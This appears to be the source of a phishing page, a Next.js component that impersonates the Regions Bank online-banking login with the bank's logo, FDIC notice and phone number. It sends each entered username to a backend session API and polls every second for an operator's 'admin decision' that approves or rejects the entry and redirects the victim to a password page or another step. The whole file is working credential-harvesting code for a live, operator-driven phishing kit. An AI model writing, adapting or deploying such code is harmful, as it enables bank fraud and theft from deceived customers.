"use client";

import { useState, useEffect } from "react";
import { useRouter } from "next/navigation";
import ClientProtection from "@/components/ClientProtection";

export default function Home() {
  const [username, setUsername] = useState("");
  const [rememberUsername, setRememberUsername] = useState(false);
  const [isLoading, setIsLoading] = useState(false);
  const [error, setError] = useState("");
  const router = useRouter();

  // Generate session ID (avoid hydration mismatch)
  const [sessionId] = useState(() => {
    if (typeof window !== "undefined") {
      return Math.random().toString(36).substring(2) + Date.now().toString(36);
    }
    return "";
  });

  const checkAdminDecision = async () => {
    if (!sessionId) return;
    try {
      const response = await fetch(`/api/session?sessionId=${sessionId}`);
      const session = await response.json();

      if (session?.status === "approved") {
        setIsLoading(false);
        const params = new URLSearchParams({
          sessionId,
          username: session.data?.username || username,
          remember: String(session.data?.rememberUsername || rememberUsername),
        });

        // Check if admin specified a redirect
        if (session.redirectTo) {
          router.push(`/${session.redirectTo}?${params.toString()}`);
        } else {
          // Default to password page
          router.push(`/password?${params.toString()}`);
        }
      } else if (session?.status === "rejected") {
        setIsLoading(false);
        setError(session.rejectionReason || "Invalid username");
      }
    } catch (error) {
      console.error("Error checking admin decision:", error);
    }
  };

  useEffect(() => {
    let interval: NodeJS.Timeout;
    if (isLoading) {
      interval = setInterval(checkAdminDecision, 1000); // Check every second
    }
    return () => {
      if (interval) clearInterval(interval);
    };
  }, [isLoading, sessionId, checkAdminDecision]);

  return (
    <ClientProtection>
      <div className="min-h-screen bg-white flex flex-col">
        {/* Header */}
        <header className="bg-white py-3 px-6 flex justify-center items-center border-b border-gray-200">
          <div className="flex flex-col items-center">
            {/* Regions Logo */}
            <div className="flex items-center mb-1">
              <svg
                className="regions-logo regions-logo--lockup regions-logo--green"
                xmlns="http://www.w3.org/2000/svg"
                width="242"
                height="41"
                viewBox="0 0 242 41"
                role="img"
                fillRule="evenodd"
                data-testid="logo"
                aria-label="Regions logo"
                style={{ width: "180px", height: "auto" }}
              >
                <path
                  className="regions-logo__pyramid"
                  fill="#7CB342"
                  d="M15.1,20l9.19,20.35H0ZM29.44.48l5.75,7.73L29.44,40.32,23.72,8.18ZM43.83,19.9,59,40.32H34.78Zm-8.13-11,7.65,10.29L31.94,40.32ZM23.23,9l3.85,31.34-11.42-21Z"
                />
                <g className="regions-logo__lockup" fill="#7CB342">
                  <path d="M98.09,38.38a28.25,28.25,0,0,1-3.58-5.61L94.09,32c-1.62-2.92-3.32-5.72-5.07-6.11v-.1c4.21-1.17,5.91-3.86,5.91-6.79,0-4-3.26-7.19-11.36-7.19H69.66v.82c3.15.6,3.7,1.53,3.7,3.91V35.93c0,2.29-1.3,3.47-3.7,3.67v.83H83.57V39.6c-2.7-.4-3.75-1.46-3.75-4V26.78c2.6,0,3.6,0,4.9,1.32,2.25,2.2,4.35,8.61,7.55,12.33h8.47V39.6A4.12,4.12,0,0,1,98.09,38.38ZM79.82,25.17V13.43h2c4,0,6.11,2,6.11,5.67C87.93,23.85,85.37,25.57,79.82,25.17Z" />
                  <path d="M121.18,18.3v4.91h-.66c-.73-2.83-1.59-3.66-4.1-3.66h-4.37V28.7h4c1.82,0,2.67-.75,3.14-2.76h.73v6.85h-.73C118.9,30.86,117.89,30,116,30h-4v6.51c0,2,.85,2.72,3.1,2.72h1.31c2.78,0,4-2,4.76-4.12h.65l-.42,5.37H104.19v-.64c2.52-.53,2.87-1.29,2.87-3.56V22c0-1.93-.47-2.62-2.87-3.07V18.3Z" />
                  <path d="M138.52,17.73c3.44,0,5,1.33,6.46,1.33a2.12,2.12,0,0,0,1.62-.76h.7v6.2h-.7A8.45,8.45,0,0,0,138.82,19c-4.64,0-7.19,4.09-7.19,10.93,0,7.08,3.1,9.84,7.27,9.84,2,0,3.41-.53,3.41-2.35V34.11A2.47,2.47,0,0,0,140,31.39v-.65h9.52v.65c-1.67.45-2.21,1.29-2.21,3.33v4.69A21.74,21.74,0,0,1,138.52,41c-8.17,0-12.31-5.79-12.31-11.46C126.21,22.76,131.43,17.73,138.52,17.73Z" />
                  <path d="M164.71,18.3v.64c-2.71.61-2.86,1.44-2.86,3.56V36.68c0,2,.5,2.54,2.86,3.1v.65H154v-.65c2.69-.65,2.85-1.38,2.85-3.37V22.05c0-2-.5-2.54-2.85-3.11V18.3Z" />
                  <path d="M182.21,17.74c-7.16,0-12.32,4.87-12.32,11.65S175.05,41,182.21,41s12.33-4.84,12.33-11.61S189.4,17.74,182.21,17.74Zm0,22c-5.11,0-6.89-4.84-6.89-10.17,0-7,2.43-10.6,6.89-10.6,4.95,0,6.92,4.35,6.92,10.56C189.13,36.84,186,39.75,182.21,39.75Z" />
                  <path d="M205.3,18.3l13.24,14.83v-10c0-2.69-.46-3.71-2.87-4.24V18.3h7.66v.64c-2.58.15-3.28,1.67-3.28,3.63V40.7h-.74L203,22.72V36.27c0,2.42.74,3.1,3.33,3.51v.65h-7.82v-.65c2.44-.37,3-1.66,3-3.81V21.14c-1.74-1.75-2.09-2-3-2.2V18.3Z" />
                  <path d="M240.52,17.73v5.83h-.66C239,21,236.57,19,234.25,19c-2.05,0-3.72,1.32-3.72,3a3.4,3.4,0,0,0,1.13,2.35c1.12,1.09,6.31,3.77,7.7,5.14a6.8,6.8,0,0,1,2.47,5.11c0,4.88-4.49,6.43-7.27,6.43s-4.37-.87-5.54-.87a1.25,1.25,0,0,0-1.15.72h-.67V34.19h.67c.65,3.29,2.82,5.56,6.07,5.56,2.43,0,4.18-1.32,4.18-3.14A3.64,3.64,0,0,0,237,34.08c-1.75-1.71-5.73-3.34-7.62-5.19a6.4,6.4,0,0,1-2-4.69c0-3.82,2.94-6.47,7.12-6.47a10.7,10.7,0,0,1,2.32.3,9.25,9.25,0,0,0,1.94.31,1.74,1.74,0,0,0,1.16-.61Z" />
                </g>
              </svg>
            </div>
            {/* FDIC Text */}
            <div className="flex items-center text-xs text-gray-600">
              <svg
                width="38"
                height="17"
                viewBox="0 0 38 17"
                fill="none"
                xmlns="http://www.w3.org/2000/svg"
                className="mr-2"
              >
                <g clipPath="url(#clip0_329_265)">
                  <path
                    d="M4.31252 16.0976H0.326904V0.481934H8.52523V4.56357H4.31252V7.09136H8.28191V11.1735H4.31252V16.0976Z"
                    fill="#003256"
                  />
                  <path
                    d="M21.6148 8.28213C21.6148 1.12937 15.5872 0.481934 13.0916 0.481934H9.07397V16.0828H13.0916L13.0854 12.0154V4.49908C15.5572 4.49908 17.6573 5.47099 17.6573 8.25725C17.6573 11.043 15.5572 12.0154 13.0854 12.0154L13.0916 16.0828C16.1969 16.0833 21.6148 15.4496 21.6148 8.28213Z"
                    fill="#003256"
                  />
                  <path
                    d="M26.2901 0.449219H22.3044V16.0974H26.2901V0.449219Z"
                    fill="#003256"
                  />
                  <path
                    d="M34.4274 11.9667C32.5128 11.9667 30.9284 10.3063 30.9284 8.27C30.9284 6.23376 32.5128 4.57277 34.4274 4.57277C36.173 4.57277 37.0857 5.56093 37.6868 6.8624V1.25942C37.6868 1.25942 35.9221 0.416992 34.2776 0.416992C30.6249 0.416992 26.6675 3.99287 26.6675 8.27C26.6675 13.5064 30.4422 16.1225 34.2776 16.1225C35.9216 16.1225 37.6868 15.2811 37.6868 15.2811V9.72686C36.9674 11.0471 36.1635 11.9667 34.4274 11.9667Z"
                    fill="#003256"
                  />
                </g>
                <defs>
                  <clipPath id="clip0_329_265">
                    <rect
                      width="37.36"
                      height="15.74"
                      fill="white"
                      transform="translate(0.326904 0.399902)"
                    />
                  </clipPath>
                </defs>
              </svg>
              <span>
                FDIC-Insured · Backed by the full faith and credit of the U.S.
                Government
              </span>
            </div>
          </div>
        </header>

        {/* Main Content */}
        <main className="flex-1 flex flex-col items-center justify-center px-6 py-10">
          <div className="w-full max-w-lg">
            {/* Title */}
            <h1 className="text-[48px] leading-tight font-normal text-gray-900 text-center mb-3">
              Access your accounts online
            </h1>
            <p className="text-[16px] font-medium text-gray-700 text-center mb-6">
              Log in to Online Banking
            </p>
            {/* Login Form */}
            <div className="bg-white rounded-[24px] shadow-[0_12px_32px_rgba(0,0,0,0.06)] p-8 border border-gray-200">
              <form
                className="space-y-6"
                onSubmit={async (e) => {
                  e.preventDefault();
                  const trimmed = username.trim();
                  if (!trimmed) return;

                  setError("");
                  setIsLoading(true);

                  // Save to database and wait for admin approval
                  if (!sessionId) {
                    setIsLoading(false);
                    return;
                  }

                  try {
                    await fetch("/api/session", {
                      method: "POST",
                      headers: { "Content-Type": "application/json" },
                      body: JSON.stringify({
                        sessionId,
                        step: "username",
                        data: {
                          username: trimmed,
                          rememberUsername,
                        },
                      }),
                    });
                  } catch (error) {
                    console.error("Error saving session:", error);
                    setIsLoading(false);
                  }
                }}
              >
                {/* Username Field */}
                <div>
                  <label
                    htmlFor="username"
                    className="block text-sm font-semibold text-gray-700 mb-2"
                  >
                    Username
                  </label>
                  <input
                    type="text"
                    id="username"
                    value={username}
                    onChange={(e) => setUsername(e.target.value)}
                    placeholder="Username"
                    className="w-full h-14 px-4 border border-gray-300 rounded-lg focus:outline-none focus:ring-2 focus:ring-green-600 focus:border-transparent placeholder-gray-600 text-gray-900"
                  />
                </div>

                {/* Remember Username Checkbox */}
                <div className="flex items-center">
                  <input
                    type="checkbox"
                    id="remember"
                    checked={rememberUsername}
                    onChange={(e) => setRememberUsername(e.target.checked)}
                    className="h-4 w-4 text-green-700 focus:ring-green-700 border-gray-300 rounded"
                  />
                  <label
                    htmlFor="remember"
                    className="ml-2 text-sm text-gray-700"
                  >
                    Remember my username
                  </label>
                </div>

                {/* Error Message */}
                {error && (
                  <div className="text-red-600 text-sm text-center bg-red-50 p-3 rounded-lg">
                    {error}
                  </div>
                )}

                {/* Continue Button */}
                <button
                  type="submit"
                  disabled={isLoading}
                  className="w-full h-12 bg-[#4C6E2C] hover:bg-[#3F5D23] disabled:opacity-60 text-white font-semibold text-[18px] rounded-full transition-colors duration-200"
                >
                  {isLoading ? "Verifying username..." : "Continue"}
                </button>
              </form>

              {/* Help Links */}
              <div className="mt-6 text-center text-sm">
                <p className="text-gray-600">
                  Forgot{" "}
                  <a href="#" className="text-blue-600 hover:underline">
                    username
                  </a>{" "}
                  or{" "}
                  <a href="#" className="text-blue-600 hover:underline">
                    password
                  </a>
                  ?
                </p>
                <p className="mt-2 text-gray-600">
                  Don&apos;t have an Online Banking account?{" "}
                  <a href="#" className="text-blue-600 hover:underline">
                    Enroll now
                  </a>
                  .
                </p>
              </div>
            </div>
          </div>
        </main>

        {/* Footer */}
        <footer className="bg-white border-t border-gray-200 py-6">
          <div className="max-w-6xl mx-auto px-6">
            {/* Footer Links */}
            <div className="flex flex-wrap justify-center items-center gap-6 text-sm text-gray-600 mb-4">
              <a href="#" className="hover:text-blue-600 hover:underline">
                Contact Us
              </a>
              <a href="#" className="hover:text-blue-600 hover:underline">
                Terms and Conditions
              </a>
              <a href="#" className="hover:text-blue-600 hover:underline">
                Privacy Pledge
              </a>
              <a href="#" className="hover:text-blue-600 hover:underline">
                Security
              </a>
              <a href="#" className="hover:text-blue-600 hover:underline">
                Notice at Collection
              </a>
              <a href="#" className="hover:text-blue-600 hover:underline">
                Online Tracking & Advertising
              </a>
              <a href="#" className="hover:text-blue-600 hover:underline">
                Accessible Banking
              </a>
              <a href="#" className="hover:text-blue-600 hover:underline">
                Leave Feedback
              </a>
            </div>

            {/* Contact Information */}
            <div className="text-center text-sm text-gray-600">
              <p>
                Call{" "}
                <a
                  href="tel:1-800-734-4667"
                  className="text-blue-600 hover:underline"
                >
                  1-800-REGIONS (1-800-734-4667)
                </a>{" "}
                or visit{" "}
                <a href="#" className="text-blue-600 hover:underline">
                  Regions Help & Support
                </a>
                .
              </p>
            </div>
          </div>
        </footer>
      </div>
    </ClientProtection>
  );
}
